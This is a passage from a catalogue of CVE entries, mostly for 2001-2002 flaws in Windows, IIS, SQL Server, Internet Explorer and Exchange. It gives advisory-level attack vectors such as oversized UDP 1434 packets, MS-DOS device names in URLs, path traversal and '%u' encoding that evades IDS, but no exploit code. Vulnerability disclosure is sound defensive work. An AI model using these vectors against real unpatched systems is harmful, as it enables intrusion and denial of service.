Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked. [CVE-2002-0650] The keep-alive mechanism for Microsoft SQL Server 2000 allows remote attackers to cause a denial of service (bandwidth consumption) via a "ping" style packet to the Resolution Service (UDP port 1434) with a spoofed IP address of another SQL Server system, which causes the two servers to exchange packets in an infinite loop. [CVE-2002-0649] Multiple buffer overflows in the Resolution Service for Microsoft SQL Server 2000 and Microsoft Desktop Engine 2000 (MSDE) allow remote attackers to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte that causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption, as exploited by the Slammer/Sapphire worm. [CVE-2002-0648] The legacy <script> data-island capability for XML in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to read arbitrary XML files, and portions of other files, via a URL whose "src" attribute redirects to a local file. [CVE-2002-0647] Buffer overflow in a legacy ActiveX control used to display specially formatted text in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code, aka "Buffer Overrun in Legacy Text Formatting ActiveX Control". [CVE-2002-0645] SQL injection vulnerability in stored procedures for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 may allow authenticated users to execute arbitrary commands. [CVE-2002-0644] Buffer overflow in several Database Consistency Checkers (DBCCs) for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 allows members of the db_owner and db_ddladmin roles to execute arbitrary code. [CVE-2002-0643] The installation of Microsoft Data Engine 1.0 (MSDE 1.0), and Microsoft SQL Server 2000 creates setup.iss files with insecure permissions and does not delete them after installation, which allows local users to obtain sensitive data, including weakly encrypted passwords, to gain privileges, aka "SQL Server Installation Process May Leave Passwords on System." [CVE-2002-0642] The registry key containing the SQL Server service account information in Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, has insecure permissions, which allows local users to gain privileges, aka "Incorrect Permission on SQL Server Service Account Registry Key." [CVE-2002-0641] Buffer overflow in bulk insert procedure of Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, allows attackers with database administration privileges to execute arbitrary code via a long filename in the BULK INSERT query. [CVE-2002-0624] Buffer overflow in the password encryption function of Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, allows remote attackers to gain control of the database and execute arbitrary code via SQL Server Authentication, aka "Unchecked Buffer in Password Encryption Procedure." [CVE-2002-0623] Buffer overflow in AuthFilter ISAPI filter on Microsoft Commerce Server 2000 and 2002 allows remote attackers to execute arbitrary code via long authentication data, aka "New Variant of the ISAPI Filter Buffer Overrun". [CVE-2002-0622] The Office Web Components (OWC) package installer for Microsoft Commerce Server 2000 allows remote attackers to execute commands by passing the commands as input to the OWC package installer, aka "OWC Package Command Execution". [CVE-2002-0621] Buffer overflow in the Office Web Components (OWC) package installer used by Microsoft Commerce Server 2000 allows remote attackers to cause the process to fail or run arbitrary code in the LocalSystem security context via certain input to the OWC package installer. [CVE-2002-0620] Buffer overflow in the Profile Service of Microsoft Commerce Server 2000 allows remote attackers to cause the server to fail or run arbitrary code in the LocalSystem security context via an input field using an affected API. [CVE-2002-0576] ColdFusion 5.0 and earlier on Windows systems allows remote attackers to determine the absolute pathname of .cfm or .dbm files via an HTTP request that contains an MS-DOS device name such as NUL, which leaks the pathname in an error message. [CVE-2002-0507] An interaction between Microsoft Outlook Web Access (OWA) with RSA SecurID allows local users to bypass the SecurID authentication for a previous user via several submissions of an OWA Authentication request with the proper OWA password for the previous user, which is eventually accepted by OWA. [CVE-2002-0481] An interaction between Windows Media Player (WMP) and Outlook 2002 allows remote attackers to bypass Outlook security settings and execute Javascript via an IFRAME in an HTML email message that references .WMS (Windows Media Skin) or other WMP media files, whose onload handlers execute the player.LaunchURL() Javascript function. [CVE-2002-0421] IIS 4.0 allows local users to bypass the "User cannot change password" policy for Windows NT by directly calling .htr password changing programs in the /iisadmpwd directory, including (1) aexp2.htr, (2) aexp2b.htr, (3) aexp3.htr , or (4) aexp4.htr. [CVE-2002-0419] Information leaks in IIS 4 through 5.1 allow remote attackers to obtain potentially sensitive information or more easily conduct brute force attacks via responses from the server in which (2) in certain configurations, the server IP address is provided as the realm for Basic authentication, which could reveal real IP addresses that were obscured by NAT, or (3) when NTLM authentication is used, the NetBIOS name of the server and its Windows NT domain are revealed in response to an Authorization request. NOTE: this entry originally contained a vector (1) in which the server reveals whether it supports Basic or NTLM authentication through 401 Access Denied error messages. CVE has REJECTED this vector [CVE-2002-0409] orderdetails.aspx, as made available to Microsoft .NET developers as example code and demonstrated on www.ibuyspystore.com, allows remote attackers to view the orders of other users by modifying the OrderID parameter. [CVE-2002-0371] Buffer overflow in gopher client for Microsoft Internet Explorer 5.1 through 6.0, Proxy Server 2.0, or ISA Server 2000 allows remote attackers to execute arbitrary code via a gopher:// URL that redirects the user to a real or simulated gopher server that sends a long response. [CVE-2002-0368] The Store Service in Microsoft Exchange 2000 allows remote attackers to cause a denial of service (CPU consumption) via a mail message with a malformed RFC message attribute, aka "Malformed Mail Attribute can Cause Exchange 2000 to Exhaust CPU Resources." [CVE-2002-0367] smss.exe debugging subsystem in Windows NT and Windows 2000 does not properly authenticate programs that connect to other programs, which allows local users to gain administrator or SYSTEM privileges by duplicating a handle to a privileged process, as demonstrated by DebPloit. [CVE-2002-0366] Buffer overflow in Remote Access Service (RAS) phonebook for Windows NT 4.0, 2000, XP, and Routing and Remote Access Server (RRAS) allows local users to execute arbitrary code by modifying the rasphone.pbk file to use a long dial-up entry. [CVE-2002-0340] Windows Media Player (WMP) 8.00.00.4477, and possibly other versions, automatically detects and executes .wmf and other content, even when the file's extension or content type does not specify .wmf, which could make it easier for attackers to conduct unauthorized activities via Trojan horse files containing .wmf content. [CVE-2002-0314] fasttrack p2p, as used in (1) KaZaA before 1.5, (2) grokster, and (3) morpheus allows remote attackers to cause a denial of service (memory exhaustion) via a series of client-to-client messages, which pops up new windows per message. [CVE-2002-0285] Outlook Express 5.5 and 6.0 on Windows treats a carriage return ("CR") in a message header as if it were a valid carriage return/line feed combination (CR/LF), which could allow remote attackers to bypass virus protection and or other filtering mechanisms via a mail message with headers that only contain the CR, which causes Outlook to create separate headers. [CVE-2002-0283] Windows XP with port 445 open allows remote attackers to cause a denial of service (CPU consumption) via a flood of TCP SYN packets containing possibly malformed data. [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message. [CVE-2002-0228] Microsoft MSN Messenger allows remote attackers to use Javascript that references an ActiveX object to obtain sensitive information such as display names and web site navigation, and possibly more when the user is connected to certain Microsoft sites (or DNS-spoofed sites). [CVE-2002-0208] PGP Security PGPfire 7.1 for Windows alters the system's TCP/IP stack and modifies packets in ICMP error messages in a way that allows remote attackers to determine that the system is running PGPfire. [CVE-2002-0201] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow. [CVE-2002-0200] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name. [CVE-2002-0193] Microsoft Internet Explorer 5.01 and 6.0 allow remote attackers to execute arbitrary code via malformed Content-Disposition and Content-Type header fields that cause the application for the spoofed file type to pass the file back to the operating system for handling rather than raise an error message, aka the first variant of the "Content Disposition" vulnerability. [CVE-2002-0191] Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to view arbitrary files that contain the "{" character via script containing the cssText property of the stylesheet object, aka "Local Information Disclosure through HTML Object" vulnerability. [CVE-2002-0190] Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to execute arbitrary code under fewer security restrictions via a malformed web page that requires NetBIOS connectivity, aka "Zone Spoofing through Malformed Web Page" vulnerability. [CVE-2002-0188] Microsoft Internet Explorer 5.01 and 6.0 allow remote attackers to execute arbitrary code via malformed Content-Disposition and Content-Type header fields that cause the application for the spoofed file type to pass the file back to the operating system for handling rather than raise an error message, aka the second variant of the "Content Disposition" vulnerability. [CVE-2002-0187] Cross-site scripting vulnerability in the SQLXML component of Microsoft SQL Server 2000 allows an attacker to execute arbitrary script via the root parameter as part of an XML SQL query, aka "Script Injection via XML Tag." [CVE-2002-0186] Buffer overflow in the SQLXML ISAPI extension of Microsoft SQL Server 2000 allows remote attackers to execute arbitrary code via data queries with a long content-type parameter, aka "Unchecked Buffer in SQLXML ISAPI Extension." [CVE-2002-0160] The administration function in Cisco Secure Access Control Server (ACS) for Windows, 2.6.x and earlier and 3.x through 3.01 (build 40), allows remote attackers to read HTML, Java class, and image files outside the web root via a ..\.. (modified ..) in the URL to port 2002. [CVE-2002-0159] Format string vulnerability in the administration function in Cisco Secure Access Control Server (ACS) for Windows, 2.6.x and earlier and 3.x through 3.01 (build 40), allows remote attackers to crash the CSADMIN module only (denial of service of administration function) or execute arbitrary code via format strings in the URL to port 2002. [CVE-2002-0155] Buffer overflow in Microsoft MSN Chat ActiveX Control, as used in MSN Messenger 4.5 and 4.6, and Exchange Instant Messenger 4.5 and 4.6, allows remote attackers to execute arbitrary code via a long ResDLL parameter in the MSNChat OCX. [CVE-2002-0154] Buffer overflows in extended stored procedures for Microsoft SQL Server 7.0 and 2000 allow remote attackers to cause a denial of service or execute arbitrary code via a database query with certain long arguments. [CVE-2002-0152] Buffer overflow in various Microsoft applications for Macintosh allows remote attackers to cause a denial of service (crash) or execute arbitrary code by invoking the file:// directive with a large number of / characters, which affects Internet Explorer 5.1, Outlook Express 5.0 through 5.0.2, Entourage v. X and 2001, PowerPoint v. X, 2001, and 98, and Excel v. X and 2001 for Macintosh. [CVE-2002-0147] Buffer overflow in the ASP data transfer mechanism in Internet Information Server (IIS) 4.0, 5.0, and 5.1 allows remote attackers to cause a denial of service or execute code, aka "Microsoft-discovered variant of Chunked Encoding buffer overrun." [CVE-2002-0142] CGI handler in John Roy Pi3Web for Windows 2.0 beta 1 and 2 allows remote attackers to cause a denial of service (crash) via a series of requests whose physical path is exactly 260 characters long and ends in a series of . (dot) characters. [CVE-2002-0101] Microsoft Internet Explorer 6.0 and earlier allows local users to cause a denial of service via an infinite loop for modeless dialogs showModelessDialog, which causes CPU usage while the focus for the dialog is not released. [CVE-2002-0078] The zone determination function in Microsoft Internet Explorer 5.5 and 6.0 allows remote attackers to run scripts in the Local Computer zone by embedding the script in a cookie, aka the "Cookie-based Script Execution" vulnerability. [CVE-2002-0077] Microsoft Internet Explorer 5.01, 5.5 and 6.0 treats objects invoked on an HTML page with the codebase property as part of Local Computer zone, which allows remote attackers to invoke executables present on the local system through objects such as the popup object, aka the "Local Executable Invocation via Object tag" vulnerability. [CVE-2002-0076] Java Runtime Environment (JRE) Bytecode Verifier allows remote attackers to escape the Java sandbox and execute commands via an applet containing an illegal cast operation, as seen in (1) Microsoft VM build 3802 and earlier as used in Internet Explorer 4.x and 5.x, (2) Netscape 6.2.1 and earlier, and possibly other implementations that use vulnerable versions of SDK or JDK, aka a variant of the "Virtual Machine Verifier" vulnerability. [CVE-2002-0070] Buffer overflow in Windows Shell (used as the Windows Desktop) allows local and possibly remote attackers to execute arbitrary code via a custom URL handler that has not been removed for an application that has been improperly uninstalled. [CVE-2002-0065] Funk Software Proxy Host 3.x uses weak encryption for the Proxy Host password, which allows local users to gain privileges by recovering the passwords from the PHOST.INI file or the Windows registry. [CVE-2002-0058] Vulnerability in Java Runtime Environment (JRE) allows remote malicious web sites to hijack or sniff a web client's sessions, when an HTTP proxy is being used, via a Java applet that redirects the session to another server, as seen in (1) Netscape 6.0 through 6.1 and 4.79 and earlier, (2) Microsoft VM build 3802 and earlier as used in Internet Explorer 4.x and 5.x, and possibly other implementations that use vulnerable versions of SDK or JDK. [CVE-2002-0057] XMLHTTP control in Microsoft XML Core Services 2.6 and later does not properly handle IE Security Zone settings, which allows remote attackers to read arbitrary files by specifying a local file as an XML Data Source. [CVE-2002-0053] Buffer overflow in SNMP agent service in Windows 95/98/98SE, Windows NT 4.0, Windows 2000, and Windows XP allows remote attackers to cause a denial of service or execute arbitrary code via a malformed management request. NOTE: this candidate may be split or merged with other candidates. This and other PROTOS-related candidates, especially CVE-2002-0012 and CVE-2002-0013, will be updated when more accurate information is available. [CVE-2002-0051] Windows 2000 allows local users to prevent the application of new group policy settings by opening Group Policy files with exclusive-read access. [CVE-2002-0050] Buffer overflow in AuthFilter ISAPI filter on Microsoft Commerce Server 2000 allows remote attackers to execute arbitrary code via long authentication data. [CVE-2002-0049] Microsoft Exchange Server 2000 System Attendant gives "Everyone" group privileges to the WinReg key, which could allow remote attackers to read or modify registry keys. [CVE-2002-0021] Network Product Identification (PID) Checker in Microsoft Office v. X for Mac allows remote attackers to cause a denial of service (crash) via a malformed product announcement. [CVE-2002-0020] Buffer overflow in telnet server in Windows 2000 and Interix 2.2 allows remote attackers to execute arbitrary code via malformed protocol options. [CVE-2001-1573] Buffer overflow in smtpscan.dll for Trend Micro InterScan VirusWall 3.51 for Windows NT has allows remote attackers to execute arbitrary code via a certain configuration parameter. [CVE-2001-1571] The Remote Desktop client in Windows XP sends the most recent user account name in cleartext, which could allow remote attackers to obtain terminal server user account names via sniffing. [CVE-2001-1570] Windows XP with fast user switching and account lockout enabled allows local users to deny user account access by setting the fast user switch to the same user (self) multiple times, which causes other accounts to be locked out. [CVE-2001-1560] Win32k.sys (aka Graphics Device Interface (GDI)) in Windows 2000 and XP allows local users to cause a denial of service (system crash) by calling the ShowWindow function after receiving a WM_NCCREATE message. [CVE-2001-1552] ssdpsrv.exe in Windows ME allows remote attackers to cause a denial of service by sending multiple newlines in a Simple Service Discovery Protocol (SSDP) message. NOTE: multiple replies to the original post state that the problem could not be reproduced. [CVE-2001-1549] Tiny Personal Firewall 1.0 and 2.0 allows local users to bypass filtering via non-standard TCP packets created with non-Windows protocol adapters. [CVE-2001-1548] ZoneAlarm 2.1 through 2.6 and ZoneAlarm Pro 2.4 and 2.6 allows local users to bypass filtering via non-standard TCP packets created with non-Windows protocol adapters. [CVE-2001-1533] DISPUTED * Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service via a flood of fragmented UDP packets. NOTE: the vendor disputes this issue, saying that it requires high bandwidth to exploit, and the server does not experience any instability. Therefore this "laws of physics" issue might not be included in CVE. [CVE-2001-1519] DISPUTED RunAs (runas.exe) in Windows 2000 allows local users to create a spoofed named pipe when the service is stopped, then capture cleartext usernames and passwords when clients connect to the service. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it. [CVE-2001-1518] RunAs (runas.exe) in Windows 2000 only creates one session instance at a time, which allows local users to cause a denial of service (RunAs hang) by creating a named pipe session with the authentication server without any request for service. NOTE: the vendor disputes this vulnerability, however the vendor also presents a scenario in which other users could be affected if running on a Terminal Server. Therefore this is a vulnerability. [CVE-2001-1517] DISPUTED RunAs (runas.exe) in Windows 2000 stores cleartext authentication information in memory, which could allow attackers to obtain usernames and passwords by executing a process that is allocated the same memory page after termination of a RunAs command. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it, and the original researcher did not respond to requests for additional information. [CVE-2001-1515] Macintosh clients, when using NT file system volumes on Windows 2000 SP1, create subdirectories and automatically modify the inherited NTFS permissions, which may cause the directories to have less restrictive permissions than intended. [CVE-2001-1514] ColdFusion 4.5 and 5, when running on Windows with the advanced security sandbox type set to "operating system," does not properly pass security context to (1) child processes created with <CFEXECUTE> and (2) child processes that call the CreateProcess function and are executed with <CFOBJECT> or end with the CFX extension, which allows attackers to execute programs with the permissions of the System account. [CVE-2001-1497] Microsoft Internet Explorer 4.0 through 6.0 could allow local users to differentiate between alphanumeric and non-alphanumeric characters used in a password by pressing certain control keys that jump between non-alphanumeric characters, which makes it easier to conduct a brute-force password guessing attack. [CVE-2001-1489] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images. [CVE-2001-1462] WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to cause the WebID agent to enter debug mode via a URL containing null characters, which may allow attackers to obtain sensitive information. [CVE-2001-1461] Directory traversal vulnerability in WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to access restricted resources via URL-encoded (1) /.. or (2) \.. sequences. [CVE-2001-1452] By default, DNS servers on Windows NT 4.0 and Windows 2000 Server cache glue records received from non-delegated name servers, which allows remote attackers to poison the DNS cache via spoofed DNS responses. [CVE-2001-1450] Microsoft Internet Explorer 5.0 through 6.0 allows attackers to cause a denial of service (browser crash) via a crafted FTP URL such as "/.#./". [CVE-2001-1410] Internet Explorer 6 and earlier allows remote attackers to create chromeless windows using the Javascript window.createPopup method, which could allow attackers to simulate a victim's display and conduct unauthorized activities or steal sensitive data via social engineering. [CVE-2001-1347] Windows 2000 allows local users to cause a denial of service and possibly gain privileges by setting a hardware breakpoint that is handled using global debug registers, which could cause other processes to terminate due to an exception, and allow hijacking of resources such as named pipes. [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer. [CVE-2001-1326] Eudora 5.1 allows remote attackers to execute arbitrary code when the "Use Microsoft Viewer" option is enabled and the "allow executables in HTML content" option is disabled, via an HTML email with a form that is activated from an image that the attacker spoofs as a link, which causes the user to execute the form and access embedded attachments. [CVE-2001-1325] Internet Explorer 5.0 and 5.5, and Outlook Express 5.0 and 5.5, allow remote attackers to execute scripts when Active Scripting is disabled by including the scripts in XML stylesheets (XSL) that are referenced using an IFRAME tag, possibly due to a vulnerability in Windows Scripting Host (WSH). [CVE-2001-1319] Microsoft Exchange 5.5 2000 allows remote attackers to cause a denial of service (hang) via exceptional BER encodings for the LDAP filter type field, as demonstrated by the PROTOS LDAPv3 test suite. [CVE-2001-1302] The change password option in the Windows Security interface for Windows 2000 allows attackers to use the option to attempt to change passwords of other users on other systems or identify valid accounts by monitoring error messages, possibly due to a problem in the NetuserChangePassword function. [CVE-2001-1288] Windows 2000 and Windows NT allows local users to cause a denial of service (reboot) by executing a command at the command prompt and pressing the F7 and enter keys several times while the command is executing, possibly related to an exception handling error in csrss.exe. [CVE-2001-1243] Scripting.FileSystemObject in asp.dll for Microsoft IIS 4.0 and 5.0 allows local or remote attackers to cause a denial of service (crash) via (1) creating an ASP program that uses Scripting.FileSystemObject to open a file with an MS-DOS device name, or (2) remotely injecting the device name into ASP programs that internally use Scripting.FileSystemObject. [CVE-2001-1238] Task Manager in Windows 2000 does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped with the Task Manager. [CVE-2001-1219] Microsoft Internet Explorer 6.0 and earlier allows malicious website operators to cause a denial of service (client crash) via JavaScript that continually refreshes the window via self.location. [CVE-2001-1218] Microsoft Internet Explorer for Unix 5.0SP1 allows local users to possibly cause a denial of service (crash) in CDE or the X server on Solaris 2.6 by rapidly scrolling Chinese characters or maximizing the window. [CVE-2001-1192] Citrix Independent Computing Architecture (ICA) Client for Windows 6.1 allows remote malicious web sites to execute arbitrary code via a .ICA file, which is downloaded and automatically executed by the client. [CVE-2001-1186] Microsoft IIS 5.0 allows remote attackers to cause a denial of service via an HTTP request with a content-length value that is larger than the size of the request, which prevents IIS from timing out the connection. [CVE-2001-1122] Windows NT 4.0 SP 6a allows a local user with write access to winnt/system32 to cause a denial of service (crash in lsass.exe) by running the NT4ALL exploit program in 'SPECIAL' mode. [CVE-2001-1116] Identix BioLogon 2.03 and earlier does not lock secondary displays on a multi-monitor system running Windows 98 or ME, which allows an attacker with physical access to the system to bypass authentication through a secondary display. [CVE-2001-1099] The default configuration of Norton AntiVirus for Microsoft Exchange 2000 2.x allows remote attackers to identify the recipient's INBOX file path by sending an email with an attachment containing malicious content, which includes the path in the rejection notice. [CVE-2001-1088] Microsoft Outlook 8.5 and earlier, and Outlook Express 5 and earlier, with the "Automatically put people I reply to in my address book" option enabled, do not notify the user when the "Reply-To" address is different than the "From" address, which could allow an untrusted remote attacker to spoof legitimate addresses and intercept email from the client that is intended for another user. [CVE-2001-0986] SQLQHit.asp sample file in Microsoft Index Server 2.0 allows remote attackers to obtain sensitive information such as the physical path, file attributes, or portions of source code by directly calling sqlqhit.asp with a CiScope parameter set to (1) webinfo, (2) extended_fileinfo, (3) extended_webinfo, or (4) fileinfo. [CVE-2001-0951] Windows 2000 allows remote attackers to cause a denial of service (CPU consumption) by flooding Internet Key Exchange (IKE) UDP port 500 with packets that contain a large number of dot characters. [CVE-2001-0919] Internet Explorer 5.50.4134.0100 on Windows ME with "Prompt to allow cookies to be stored on your machine" enabled does not warn a user when a cookie is set using Javascript. [CVE-2001-0902] Microsoft IIS 5.0 allows remote attackers to spoof web log entries via an HTTP request that includes hex-encoded newline or form-feed characters. [CVE-2001-0877] Universal Plug and Play (UPnP) on Windows 98, 98SE, ME, and XP allows remote attackers to cause a denial of service via (1) a spoofed SSDP advertisement that causes the client to connect to a service on another machine that generates a large amount of traffic (e.g., chargen), or (2) via a spoofed SSDP announcement to broadcast or multicast addresses, which could cause all UPnP clients to send traffic to a single target system. [CVE-2001-0876] Buffer overflow in Universal Plug and Play (UPnP) on Windows 98, 98SE, ME, and XP allows remote attackers to execute arbitrary code via a NOTIFY directive with a long Location URL. [CVE-2001-0860] Terminal Services Manager MMC in Windows 2000 and XP trusts the Client Address (IP address) that is provided by the client instead of obtaining it from the packet headers, which allows clients to spoof their public IP address, e.g. through a Network Address Translation (NAT). [CVE-2001-0845] Vulnerability in DECwindows Motif Server on OpenVMS VAX or Alpha 6.2 through 7.3, and SEVMS VAX or Alpha 6.2, allows local users to gain access to unauthorized resources. [CVE-2001-0791] Trend Micro InterScan VirusWall for Windows NT allows remote attackers to make configuration changes by directly calling certain CGI programs, which do not restrict access. [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters. [CVE-2001-0726] Outlook Web Access (OWA) in Microsoft Exchange 5.5 Server, when used with Internet Explorer, does not properly detect certain inline script, which can allow remote attackers to perform arbitrary actions on a user's Exchange mailbox via an HTML e-mail message. [CVE-2001-0721] Universal Plug and Play (UPnP) in Windows 98, 98SE, ME, and XP allows remote attackers to cause a denial of service (memory consumption or crash) via a malformed UPnP request. [CVE-2001-0718] Vulnerability in (1) Microsoft Excel 2002 and earlier and (2) Microsoft PowerPoint 2002 and earlier allows attackers to bypass macro restrictions and execute arbitrary commands by modifying the data stream in the document. [CVE-2001-0709] Microsoft IIS 4.0 and before, when installed on a FAT partition, allows a remote attacker to obtain source code of ASP files via a URL encoded with Unicode. [CVE-2001-0687] Broker FTP server 5.9.5 for Windows NT and 9x allows a remote attacker to retrieve privileged web server system information by (1) issuing a CD command (CD C:) followed by the LS command, (2) specifying arbitrary paths in the UNC format (\\computername\sharename). [CVE-2001-0678] A buffer overflow in reggo.dll file used by Trend Micro InterScan VirusWall prior to 3.51 build 1349 for Windows NT 3.5 and InterScan WebManager 1.2 allows a local attacker to execute arbitrary code. [CVE-2001-0675] Rit Research Labs The Bat! 1.51 for Windows allows a remote attacker to cause a denial of service by sending an email to a user's account containing a carrage return <CR> that is not followed by a line feed <LF>. [CVE-2001-0669] Various Intrusion Detection Systems (IDS) including (1) Cisco Secure Intrusion Detection System, (2) Cisco Catalyst 6000 Intrusion Detection System Module, (3) Dragon Sensor 4.x, (4) Snort before 1.8.1, (5) ISS RealSecure Network Sensor 5.x and 6.x before XPU 3.2, and (6) ISS RealSecure Server Sensor 5.5 and 6.0 for Windows, allow remote attackers to evade detection of HTTP attacks via non-standard "%u" Unicode encoding of ASCII characters in the requested URL. [CVE-2001-0666] Outlook Web Access (OWA) in Microsoft Exchange 2000 allows an authenticated user to cause a denial of service (CPU consumption) via a malformed OWA request for a deeply nested folder within the user's mailbox. [CVE-2001-0663] Terminal Server in Windows NT and Windows 2000 allows remote attackers to cause a denial of service via a sequence of invalid Remote Desktop Protocol (RDP) packets. [CVE-2001-0662] RPC endpoint mapper in Windows NT 4.0 allows remote attackers to cause a denial of service (loss of RPC services) via a malformed request. [CVE-2001-0660] Outlook Web Access (OWA) in Microsoft Exchange 5.5, SP4 and earlier, allows remote attackers to identify valid user email addresses by directly accessing a back-end function that processes the global address list (GAL). [CVE-2001-0659] Buffer overflow in IrDA driver providing infrared data exchange on Windows 2000 allows attackers who are physically close to the machine to cause a denial of service (reboot) via a malformed IrDA packet. [CVE-2001-0658] Cross-site scripting (CSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause other clients to execute certain script or read cookies via malicious script in an invalid URL that is not properly quoted in an error message. [CVE-2001-0628] Microsoft Word 2000 does not check AutoRecovery (.asd) files for macros, which allows a local attacker to execute arbitrary macros with the user ID of the Word user. [CVE-2001-0547] Memory leak in the proxy service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows local attackers to cause a denial of service (resource exhaustion). [CVE-2001-0546] Memory leak in H.323 Gatekeeper Service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (resource exhaustion) via a large amount of malformed H.323 data. [CVE-2001-0543] Memory leak in NNTP service in Windows NT 4.0 and Windows 2000 allows remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed posts. [CVE-2001-0542] Buffer overflows in Microsoft SQL Server 7.0 and 2000 allow attackers with access to SQL Server to execute arbitrary code through the functions (1) raiserror, (2) formatmessage, or (3) xp_sprintf. NOTE: the C runtime format string vulnerability reported in MS01-060 is identified by CVE-2001-0879. [CVE-2001-0540] Memory leak in Terminal servers in Windows NT and Windows 2000 allows remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed Remote Desktop Protocol (RDP) requests to port 3389. [CVE-2001-0538] Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier allows remote attackers to execute arbitrary commands via a malicious HTML e-mail message or web page. [CVE-2001-0513] Oracle listener process on Windows NT redirects connection requests to another port and creates a separate thread to process the request, which allows remote attackers to cause a denial of service by repeatedly connecting to the Oracle listener but not connecting to the redirected port. [CVE-2001-0505] Multiple memory leaks in Microsoft Services for Unix 2.0 allow remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed requests to (1) the Telnet service, or (2) the NFS service. [CVE-2001-0503] Microsoft NetMeeting 3.01 with Remote Desktop Sharing enabled allows remote attackers to cause a denial of service via a malformed string to the NetMeeting service port, aka a variant of the "NetMeeting Desktop Sharing" vulnerability. [CVE-2001-0502] Running Windows 2000 LDAP Server over SSL, a function does not properly check the permissions of a user request when the directory principal is a domain user and the data attribute is the domain password, which allows local users to modify the login password of other users. [CVE-2001-0501] Microsoft Word 2002 and earlier allows attackers to automatically execute macros without warning the user by embedding the macros in a manner that escapes detection by the security scanner. [CVE-2001-0382] Computer Associates CCC\Harvest 5.0 for Windows NT/2000 uses weak encryption for passwords, which allows a remote attacker to gain privileges on the application. [CVE-2001-0373] The default configuration of the Dr. Watson program in Windows NT and Windows 2000 generates user.dmp crash dump files with world-readable permissions, which could allow a local user to gain access to sensitive information. [CVE-2001-0365] Eudora before 5.1 allows a remote attacker to execute arbitrary code, when the 'Use Microsoft Viewer' and 'allow executables in HTML content' options are enabled, via an HTML email message containing Javascript, with ActiveX controls and malicious code within IMG tags. [CVE-2001-0364] SSH Communications Security sshd 2.4 for Windows allows remote attackers to create a denial of service via a large number of simultaneous connections. [CVE-2001-0344] An SQL query method in Microsoft SQL Server 2000 Gold and 7.0 using Mixed Mode allows local database users to gain privileges by reusing a cached connection of the sa administrator account. [CVE-2001-0341] Buffer overflow in Microsoft Visual Studio RAD Support sub-component of FrontPage Server Extensions allows remote attackers to execute arbitrary commands via a long registration request (URL) to fp30reg.dll. [CVE-2001-0340] An interaction between the Outlook Web Access (OWA) service in Microsoft Exchange 2000 Server and Internet Explorer allows attackers to execute malicious script code against a user's mailbox via a message attachment that contains HTML code, which is executed automatically. [CVE-2001-0337] The Microsoft MS01-014 and MS01-016 patches for IIS 5.0 and earlier introduce a memory leak which allows attackers to cause a denial of service via a series of requests. [CVE-2001-0336] The Microsoft MS00-060 patch for IIS 5.0 and earlier introduces an error which allows attackers to cause a denial of service via a malformed request. [CVE-2001-0324] Windows 98 and Windows 2000 Java clients allow remote attackers to cause a denial of service via a Java applet that opens a large number of UDP sockets, which prevents the host from establishing any additional UDP connections, and possibly causes a crash. [CVE-2001-0281] Format string vulnerability in DbgPrint function, used in debug messages for some Windows NT drivers (possibly when called through DebugMessage), may allow local users to gain privileges. [CVE-2001-0265] ASCII Armor parser in Windows PGP 7.0.3 and earlier allows attackers to create files in arbitrary locations via a malformed ASCII armored file. [CVE-2001-0244] Buffer overflow in Microsoft Index Server 2.0 allows remote attackers to execute arbitrary commands via a long search parameter. [CVE-2001-0243] Windows Media Player 7 and earlier stores Internet shortcuts in a user's Temporary Files folder with a fixed filename instead of in the Internet Explorer cache, which causes the HTML in those shortcuts to run in the Local Computer Zone instead of the Internet Zone, which allows remote attackers to read certain files. [CVE-2001-0241] Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0. [CVE-2001-0240] Microsoft Word before Word 2002 allows attackers to automatically execute macros without warning the user via a Rich Text Format (RTF) document that links to a template with the embedded macro. [CVE-2001-0239] Microsoft Internet Security and Acceleration (ISA) Server 2000 Web Proxy allows remote attackers to cause a denial of service via a long web 